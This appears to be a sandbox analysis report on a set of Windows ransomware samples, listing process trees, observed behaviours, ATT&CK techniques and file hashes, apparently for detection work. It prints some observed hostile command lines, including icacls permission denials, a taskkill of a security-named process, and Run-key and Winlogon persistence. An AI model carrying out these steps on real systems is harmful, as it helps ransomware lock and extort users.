C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exeHEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4480 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\ecc3850c-a3f1-4e9f-bf3e-e16dac3f83c4" /deny *S-1-1-0:(OI)(CI)(DE,DC)5⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:6048
-
-
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe"C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1660 -
C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe"C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe" --Admin IsNotAutoStart IsNotTask6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5844
-
-
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exeTrojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe3⤵
- Modifies WinLogon for persistence
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Disables RegEdit via registry modification
- Drops startup file
- Executes dropped EXE
- Modifies system executable filetype association
- Adds Run key to start application
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies Control Panel
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:3548 -
C:\Windows\xk.exeC:\Windows\xk.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5916
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5468
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6276
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5248
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6668
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5404
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6200
-
-
C:\Windows\xk.exeC:\Windows\xk.exe4⤵
- Executes dropped EXE
PID:5220
-
-
C:\Windows\SysWOW64\IExplorer.exeC:\Windows\system32\IExplorer.exe4⤵
- Executes dropped EXE
PID:1332
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"4⤵
- Executes dropped EXE
PID:6368
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\CSRSS.EXE"4⤵
- Executes dropped EXE
PID:5400
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SERVICES.EXE"4⤵
- Executes dropped EXE
PID:5252
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\LSASS.EXE"4⤵
- Executes dropped EXE
PID:6396
-
-
C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"C:\Users\Admin\Local Settings\Application Data\WINDOWS\SMSS.EXE"4⤵
- Executes dropped EXE
PID:6064
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exeTrojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1840 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 4084⤵
- Program crash
PID:4936
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exeTrojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im Windowsecurity.exe /f4⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Users\Admin\AppData\PI-2.jpg4⤵
- System Location Discovery: System Language Discovery
PID:2092
-
-
-
C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exeTrojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3160 -
C:\Users\Admin\AppData\Roaming\MediaFoundation.exe"C:\Users\Admin\AppData\Roaming\MediaFoundation.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5680
-
-
-
Process: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe (tree depth 3)
Command line: Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 6012

Process: C:\Users\Admin\AppData\Local\Temp\huter.exe (tree depth 4)
Command line: "C:\Users\Admin\AppData\Local\Temp\huter.exe"
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 6412

Process: C:\Windows\SysWOW64\cmd.exe (tree depth 4)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sanfdr.bat" "
- System Location Discovery: System Language Discovery
PID: 1392
Process: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe (tree depth 3)
Command line: Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID: 6236
Process: C:\Windows\SysWOW64\WerFault.exe (tree depth 1)
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3772 -ip 3772
PID: 2304

Process: C:\Windows\SysWOW64\WerFault.exe (tree depth 1)
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 1840 -ip 1840
PID: 440

Process: C:\Windows\SysWOW64\WerFault.exe (tree depth 1)
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 540 -ip 540
PID: 4344

Process: C:\Windows\system32\vssvc.exe (tree depth 1)
Command line: C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
PID: 5592

Process: C:\Windows\SysWOW64\WerFault.exe (tree depth 1)
Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 4312 -ip 4312
PID: 5760

Process: C:\Windows\system32\wbengine.exe (tree depth 1)
Command line: "C:\Windows\system32\wbengine.exe"
- Suspicious use of AdjustPrivilegeToken
PID: 6924

Process: C:\Windows\System32\vdsldr.exe (tree depth 1)
Command line: C:\Windows\System32\vdsldr.exe -Embedding
PID: 7044

Process: C:\Windows\System32\vds.exe (tree depth 1)
Command line: C:\Windows\System32\vds.exe
- Checks SCSI registry key(s)
PID: 5504

Process: C:\Windows\System32\rundll32.exe (tree depth 1)
Command line: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
PID: 5132

Process: C:\Windows\system32\svchost.exe (tree depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
PID: 5388

Process: C:\Windows\system32\svchost.exe (tree depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost
PID: 6428

Process: C:\Windows\system32\svchost.exe (tree depth 1)
Command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s FDResPub
PID: 3960

Process: C:\Windows\system32\sihost.exe (tree depth 1)
Command line: sihost.exe
PID: 2344

Process: C:\Windows\system32\sihost.exe (tree depth 1)
Command line: sihost.exe
PID: 6464

Process: C:\Windows\system32\sihost.exe (tree depth 1)
Command line: sihost.exe
PID: 4060

Process: C:\Windows\system32\sihost.exe (tree depth 1)
Command line: sihost.exe
PID: 6188

Process: C:\Windows\system32\sihost.exe (tree depth 1)
Command line: sihost.exe
PID: 3676

Process: C:\Windows\system32\sihost.exe (tree depth 1)
Command line: sihost.exe
PID: 6944

Process: C:\Windows\system32\svchost.exe (tree depth 1)
Command line: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
PID: 4464

Process: C:\Windows\system32\svchost.exe (tree depth 1)
Command line: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
PID: 5168
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (2)
  - PowerShell (1)
- System Services (1)
  - Service Execution (1)
- Windows Management Instrumentation (1)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Change Default File Association (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (1)
  - Winlogon Helper DLL (1)
- Create or Modify System Process (1)
  - Windows Service (1)
- Event Triggered Execution (1)
  - Change Default File Association (1)
Defense Evasion
- Direct Volume Access (1)
- File and Directory Permissions Modification (1)
- Hide Artifacts (2)
  - Hidden Files and Directories (2)
- Indicator Removal (3)
  - File Deletion (3)
- Modify Registry (6)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (1)
  - Credentials In Files (1)
Discovery
- Browser Information Discovery (1)
- Network Service Discovery (1)
- Network Share Discovery (1)
- Peripheral Device Discovery (2)
- Query Registry (4)
- Remote System Discovery (1)
- System Information Discovery (4)
- System Location Discovery (1)
  - System Language Discovery (1)
Downloads
Filesize: 1KB
MD5: 524f89eecca9dc38902d3b9e9f58f445
SHA1: 4c2beddf7c3eb4c81f38e1c2a0ff82d80bdc1055
SHA256: 1482e3fba2b16e4af4390b633da0972ab29ca8b9f28842ed42246c9d20c77eb1
SHA512: c43c3a2e683b5aed7a5aa824f9aa0b69f847e7297df898de97787fc8a25fce70578aaff5c6844263230cdddd759901f3efb4442be9f91664a5f66379f1b63aa7

Filesize: 272KB
MD5: 5638c3651767b7bb8245754e937074a2
SHA1: acdaba11b1fe0748a57e54ae0ab6073c396f7aaa
SHA256: 1d8dd7e85a3c538c8c9e55b6a01cd453aa24983b0f9ee2ee5587d38a66cdeff1
SHA512: e94aafdbade634af8962066479de5fe52ae24a2d11b46d660b1822e6c09b096c6d688aac84641a5be33ce0c0b5a9173a3bca5dece149fc08b6f47c6ec54fd5d4

Filesize: 1KB
MD5: 67e486b2f148a3fca863728242b6273e
SHA1: 452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256: facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512: d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Filesize: 436B
MD5: 971c514f84bba0785f80aa1c23edfd79
SHA1: 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256: f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512: 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

File: C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize: 174B
MD5: 9d082d40e98fa9c786143088a4e8907d
SHA1: 037fb1e7fe62218b5069aab8a4df5ea6bacb6ec1
SHA256: 228f2d94523d6fb4b4e3a522e40f3b714d438a3a4480b5a1f5b8d114df3e553b
SHA512: 4fb7bd76726f51e9389a7daa491039d422201a5a8760fb1e0f2cf2063e6dceb50300e5b30c484d370fc93d3db58004267b87f71efad649504b5e73c4d8b348d7

File: C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize: 170B
MD5: 5265a9b51e0ec52d3a87ee4141abbe28
SHA1: 9e80727bf99c0e6f78c1c52e64e2b198c16ec2a1
SHA256: b9d323c31879c6265f68de8de62f2c259a376bc79a5772d7daa9e7ef61c45183
SHA512: 3ffe89e4706011d655dee76a042b0cb7c90949b1838207ab3280e72ad384c1db4ee85ca83d52da15a3a43f277b710973b0d3d04135e8fe349f6bf18460be0a28

Filesize: 64KB
MD5: d2fb266b97caff2086bf0fa74eddb6b2
SHA1: 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256: b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512: c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
Filesize: 4B
MD5: f49655f856acb8884cc0ace29216f511
SHA1: cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256: 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512: 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

Filesize: 944B
MD5: 6bd369f7c74a28194c991ed1404da30f
SHA1: 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256: 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512: 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 89KB
MD5: b3be26d272a56c122b3313746499a33e
SHA1: 6d5b5d2d2da7b8683d8dffd5e770ba5b7e6c95d7
SHA256: ede4aeb373e2fb96ff63239232d2fbc6c1c4c6b5b1a606f67e8236535bf478da
SHA512: 03dccefc6f5ac0386a11d05d848cfaa76dfa495cdaf0b6ab0d34c1333dd389960f93fb700c1638eb385814a7c0462b6a353965bc7e053ac27a411fc30114f91e

Filesize: 833KB
MD5: 9ac2d2c1df56dd78d4f8183dc233e686
SHA1: 17664b6c0062cd619aeef4f920000500cd8401ac
SHA256: b69ba5515cfd5fc5fb687fde0f8ee2b1385f0a58d86b7b5e91ef5a4763f309d9
SHA512: 8d29e3a7c666d4acf8a8e87861529862c6af59c3d233fe60881d9493522806f276fdeb0fbe928ddbc2f3e55dc978a3b410c75113687ce3d32a918b1fcd05c220
File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885.exe
Filesize: 1.9MB
MD5: 6d92d64fbf2708ff6d6419eb6f0a6498
SHA1: 296641f6bfe7fb36df350ffe1b8a4f8452ea8317
SHA256: 404274ad22b7fd6b96f9bc15221b4e51e92baedbb616aa544a684c38fcd69885
SHA512: 04b796f217fca1e770c44e09a2aa18b5e502c05ad729b66fe0d9307325e517971fdc9b8cb7a3d0ec306371a9214d41dcf68178ff76e7b544665913c668f7a238

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44.exe
Filesize: 114KB
MD5: 2b793d5c9272f880bd2ae2e33416c7d6
SHA1: a20419a11498e9b2839d5007c42cf60109d53146
SHA256: 6d99e19a2bbf1a1e96e7dfcc2e38326e4015e924afa917e1333ffb44ab85ad44
SHA512: ca480366ccd899a37eff604635b7c096abfe6dd949d471501a3dbe094b29dabdeca90a9dd165a1a4c5c3319b6700b3ae08da8dbd1a9ab2d42f14ac1ce366d62f

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Blocker.gen-fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48.exe
Filesize: 3.4MB
MD5: 6704fc0d789f4dba7a654ca7df2b11f4
SHA1: 4ea1f3fd59c1f5c6e8ef9eeaecf31a4c92afda74
SHA256: fd0e85a143dccc8cee5c7c52ab2dba3a931c368bafbc886d6589d7b725313e48
SHA512: 9dec198b1e90a4b98d157c8fa888daf36bf4c4f4e3011d47af56a4e257c40bc88d29cd8f3436b5f1ee1663421fe3dbaf4334a1affeadeefdd64762216c830a3c

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Encoder.gen-a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682.exe
Filesize: 122KB
MD5: b4d5fd84ae9a7813ed428517d5773ed7
SHA1: 863d7d3a22e17464fa0a56300a2645c88ed930b7
SHA256: a3a72a6a267ef5b0ca2886ace87fb254b396efeef34b01f4858981140f1a1682
SHA512: 84dd867735dcc54f84ab6d3bd7f1729ded4ca7563b44b9547689057e057ecbb75e44c17ae0868aff7e56bddc271293d801487d3031b33c19ebea9313025dd24c

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.MSIL.Foreign.gen-a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc.exe
Filesize: 9.3MB
MD5: 8d62bd2846deb7bb49405e872e9804ed
SHA1: 83a147d4ff0f92cf67a2271a7f78895db463330d
SHA256: a01dc7b3599b680aaf57c8b1d4b1a20575c720bfe04f339748eb0f9194fcfffc
SHA512: 154a7c1fb25cb4fdf01dd8c862aba564ccddadb8d7334334ebc3ce8383534eca1ed98c8dd5cc799153185d1856ae82955697b919a5488ec9852a6432e1912ab9

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Convagent.gen-581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163.exe
Filesize: 604KB
MD5: 0a5b3d2c6105fa66a80a6a700822a42b
SHA1: 61c81d0704c32312d746233578508190c22f86f7
SHA256: 581af25d67022dadaf32cf3986bd5a79f4a7f822da606f89e3fd4acc90814163
SHA512: 907e48498109265d2f1d4760c77dacbeeb053408e088c485258ed5050d0be3339195370fea4df703feeeadab697633aaf841ea3d3fd83b8f62ef83338f6fd001

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.GandCrypt.gen-612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545.exe
Filesize: 322KB
MD5: 5b9d26ae49cc9122da07cd721788098d
SHA1: 700e4e5b508fb20d82a387f744bb3adf2981c537
SHA256: 612278239c759c6f8fa512a6b48887e502f4c989987c574213485b1eb318b545
SHA512: e972e0e37f032776e46f3b0a9de7965012d7b1bf41553c0cb73756d67ed3402183e42911e2ba5cd408c1c621715b773413c966a8bed9097342e972196343ab64
File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Generic-666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538.exe
Filesize: 58KB
MD5: be3e139ee678b11e436dc6273a7e33e9
SHA1: c0ef67c300e57684657f0a13e5ccd88450adcc96
SHA256: 666429fe4ba3e37dd40b17c00c65544e7f6f67746eddcb613a9fc9cc15eb7538
SHA512: 43dee9ccfd737733b738207ec850291f23422760577770a2729aa002131037dedd1ef66fc0cc7d4fe3cb46ae379ef66f7de6a77facbcd4f5c7b769ffc9d9814c

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Lockbit.vho-ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30.exe
Filesize: 146KB
MD5: 10b3fd3c861d5cf657934c89260590ab
SHA1: 7f34253a70c74ab3059714ff8de44de89609803c
SHA256: ce9261b9bcbf5be7ec01b8224ac5179b76108fe5d37a6bdc62731392df2b2c30
SHA512: a01f7dde1ddd9e23c5c0d94ef8755eace5493f27dd173f4b3fde38411319c683d05d06cf30fea235c909fb9f3e4f80089bd2249a3f99a637305afd7f849758d9

File: C:\Users\Admin\Desktop\00435\HEUR-Trojan-Ransom.Win32.Stop.gen-f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594.exe
Filesize: 874KB
MD5: 2e0d1b3698ec45dd59526a5f72aeb6f7
SHA1: abf0bb60c60af61fb03b5f136760b6ff9ac3d48a
SHA256: f9e9303fa01b9f4ec0afa7adc0b0d3fe894fb351e550001cd5fabc71998ee594
SHA512: 90fa337309b897e2887f934cc1f1f26c2aa8b6e7e06a39d493490331243776a3dccb671b0aa236583f2ccc8328b289f0fdb252fd0b14686d3541baf42c79979f

File: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Blocker.kpuo-66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0.exe
Filesize: 272KB
MD5: c5bf915e6a2dac2d03b3bf43c7e0d774
SHA1: 829be27536921de8feb3c7b31a02ffc1ab6557cf
SHA256: 66b07beba5134219026b83039d15879522dca7f4d9e8b901fd083a045fd08ff0
SHA512: c15e7a83ad49bcaef6a7668bbd8173a0d82687dd461d25a6810cf7a180fa3478aa723371e9516714f72325591ec30767330ff7cb5688336bd365e77f436d56fa

File: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Cryptor.eet-d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51.exe
Filesize: 851KB
MD5: 4cd6ac6a04eb5234757e84ebf401caf7
SHA1: 5d067a5e54033f84535a768a3a93539143c65b44
SHA256: d2464dd0508e2b8632fe91c5c0447e963026e4c722f078d93cdc97a3ed7c6c51
SHA512: efee3e3fa185340bccb914e967f7d4d419607e3364228e9f4524d1626b9b3f790ea4322cd3789fe59cfd0d0073529b8a2f18804859759469e30e131fedf475ba

File: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Foreign.lhmm-247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960.exe
Filesize: 196KB
MD5: 5c1ad0318b0dc5f608b03ed3be1a18b7
SHA1: 4b2f8f01b11c64673cb9ab970e157ac23223df4e
SHA256: 247768db6711ac63f7fae5e9731c977d3a2a1b07878394b79640d8d86d94b960
SHA512: b2a31dbe5a8612688a9bf4c1650c90498da8cc11c10dff6fa49a9bdade47975f222bdf6b72a9445000d50f60217f6a193fb05ec06e7893af212cc5d7c78771e0
File: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Foreign.xqx-ad99d1d265eb64a2b40fbc6f4a1118877001ff0724152c8fea243c7a5e833fc5.exe
Filesize: 3.2MB
MD5: 2b4a41caee2ecd45273778951b602085
SHA1: c74176c0c25e29c385937ed89d81b6728816f17d
SHA256: ad99d1d265eb64a2b40fbc6f4a1118877001ff0724152c8fea243c7a5e833fc5
SHA512: a730014810a71a03a12d32eda4abccc15575c9f1436baf694e77df8c3c7d48a2b5e8b8a88ac95a9d684ad212d8ccd99803e7a97b0ec736bfe14ea89561a6591f

File: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Gen.abhi-9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466.exe
Filesize: 1.1MB
MD5: 52a3eff0de2c6305c3639f1718c94c98
SHA1: affca8d7d8ee7882ce36ae3be6f42b298b07903f
SHA256: 9e3ae46b36c519237def9e164f6261c2987a5385a96048efc8f7868a74154466
SHA512: 6eadd1fa06ecd08e80304eb15b4f8e9c23261ee006994e216c298d158eeea76fb8d46abeb3c2f95b35ab146c2af39dd51d0b6a0a1d8bf4d85b5ac75561612035

File: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.GenericCryptor.czo-44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4.exe
Filesize: 89KB
MD5: 75edc0a5978219e8f6f7dff68d5425f1
SHA1: 9a073f81da7e7c1260fcd4d0c9982822a8162547
SHA256: 44be0c9b9d42340cd693c9ed14888d44b967ea5c30c8d716c45efac5a4483bc4
SHA512: 6acc26581cd05272231450cb2034c57d088815b654fef12a22c4aba52b0b83fe9e633f6b8d478816d12d87a783a77222594ddf83a7928b15a0d097c4e9e60d1b

File: C:\Users\Admin\Desktop\00435\Trojan-Ransom.Win32.Wanna.amap-5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9.exe
Filesize: 2.0MB
MD5: 1e417085ae5bb12cc7cab4708c3a6301
SHA1: ba6f56ecb5a1e73b5f9566079c5936ed70b1f1b3
SHA256: 5dddfbb252515674a8ae287a8e16dc3122309e91f6f4b5a3e4c6c5b14166ebf9
SHA512: b95e57d3c4c3ea3e0bf93c155f34ca8f89f20ad421c11a4e4906c7d7fc10e78398548e1ab899f1426202038d1fa58d9d6c04fc94ba3c55f04abb6f3b4c3b4853

Filesize: 86KB
MD5: ed07699cfbcfbe8cc883f62bc67d21f1
SHA1: 625d25245cb53712fda368a51e0b300e0e773bfa
SHA256: 6afa4827ef5030e24ce9bc7887749c3522a164fd9971cb1a99cedc53769201a9
SHA512: 1b4f054b4c00f5bf10bdd0a72224fb1b69710126ce80e0657924ba480c9fc148d799a690d6f439e39c8ac3eb236bf1e8cd17636c703bf8fcb4d957d24efd5139

Filesize: 272KB
MD5: 882e42f52d28a99ddb1938be714d323d
SHA1: 5efe12e06d431dd56df471e9bce3ec40a1b2af2e
SHA256: c18940f0625571fc9940485a44d723d4cc8052a154dfce9506025413ce8e9f05
SHA512: 51410899ca6dc1d4438a613fab2386fe05624b88fa0815761bcf338679192d2b5e883a4c5aca1a16a49a42b40d98ee7a8fef915adf4c374a97fe8826c077f980
Filesize: 272KB
MD5: 8925a3dd0897dd5b9c6bb4fa1bf8f18c
SHA1: 13e6bf0b80347e756cb6583be561b59fe977b554
SHA256: b2c48519d4aef1845d7d4f9d7f021e2b6d12d8d64253161a812d9bbd853e4977
SHA512: c90d137f44d82a5bc807f682f35309bdbd5858ffa8c6d5cc31f7a1abb0576d727967b0ec483d7e1fce2455e89df68c6890481b40df9f37339115fff3ebd470a4

Filesize: 272KB
MD5: ec1639d817868f02100d14a164070e49
SHA1: 47921ac66050a04c17ed07803bd33c162f9ff467
